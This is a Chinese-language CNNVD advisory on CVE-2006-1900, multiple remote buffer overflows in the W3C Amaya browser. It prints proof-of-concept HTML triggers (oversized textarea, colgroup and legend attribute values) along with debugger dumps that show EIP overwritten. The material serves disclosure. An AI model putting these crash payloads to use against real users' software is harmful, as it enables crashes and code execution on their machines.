W3C Amaya多个远程溢出漏洞

CNNVD-ID编号 CNNVD-200604-389
CVE编号 CVE-2006-1900
发布时间 2006-04-20
更新时间 2006-04-24
漏洞类型 缓冲区溢出
漏洞来源 Thomas Waldegger bugtraq@morph3us.org
危险等级 高危
威胁类型 远程
厂 商 w3c

漏洞介绍

W3C的Amaya是一个所见即所得的Web浏览器和认证程序。

Amaya实现上存在多个漏洞,远程攻击者可能导致程序崩溃或执行任意指令。

以下代码段(可能还有其他类似的代码段)可以强迫Amaya崩溃:

> <colgroup compact=\"Ax200\">

> [...]

> <textarea rows=\"Ax200\">

> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420

> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0

> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206

> 004edd61 03f3 add esi,ebx

> 004edd63 a4 movsb

> 004edd64 8b4500 mov eax,[ebp]

> 004edd67 8b8c241c010000 mov ecx,[esp+0x11c]

> 004edd6e 8b942418010000 mov edx,[esp+0x118]

> 004edd75 50 push eax

> 004edd76 51 push ecx

> 004edd77 53 push ebx

> 004edd78 52 push edx

> 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)

> 004edd7e 53 push ebx

> 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)

> 004edd84 83c428 add esp,0x28

> 004edd87 8bbc24fc000000 mov edi,[esp+0xfc]

> 004edd8e 8b942400010000 mov edx,[esp+0x100]

> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]

> ds:0023:41414181=????????

> 004edd98 83f844 cmp eax,0x44

> 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)

> 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57

> 004edda6 0f8465060000 je amaya+0xee411 (004ee411)

> 004eddac 8b4500 mov eax,[ebp]

> 004eddaf 8b8c2408010000 mov ecx,[esp+0x108]

> 004eddb6 6aff push 0xff

> 004eddb8 50 push eax

> 004eddb9 51 push ecx

> 004eddba 57 push edi

> 004eddbb e8d33af1ff call amaya+0x1893 (00401893)

> 004eddc0 83c410 add esp,0x10

> 004eddc3 5f pop edi

> 004eddc4 5e pop esi

> 004eddc5 5d pop ebp

这样就可以控制EIP:

> <textarea rows=

> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>

> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472

> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000

> Function: <nosymbols>

> No prior disassembly possible

> 42424242 ?? ???

> 42424244 ?? ???

> 42424246 ?? ???

> 42424248 ?? ???

> 4242424a ?? ???

> 4242424c ?? ???

此外,以下代码段也可以导致Amaya 9.4崩溃:

> <legend color=\"Ax200\">

> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000

> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0

> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206

> 00516114 56 push esi

> 00516115 57 push edi

> 00516116 33ff xor edi,edi> 00516118 33f6 xor esi,esi

> 0051611a 3bcf cmp ecx,edi

> 0051611c 893d943df101 mov [amaya+0x1b13d94

> (01f13d94)],edi

> 00516122 7511 jnz amaya+0x116135 (00516135)

> 00516124 6a0a push 0xa

> 00516126 e825d80500 call amaya+0x173950 (00573950)

> 0051612b 83c404 add esp,0x4

> 0051612e 8bd7 mov edx,edi

> 00516130 8bc6 mov eax,esi

> 00516132 5f pop edi

> 00516133 5e pop esi

> 00516134 c3 ret

> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]

> ds:0023:41414175=????????

> 00516138 3bc7 cmp eax,edi

> 0051613a 74f2 jz amaya+0x11612e (0051612e)

漏洞补丁

目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:

参考网址

受影响实体

信息来源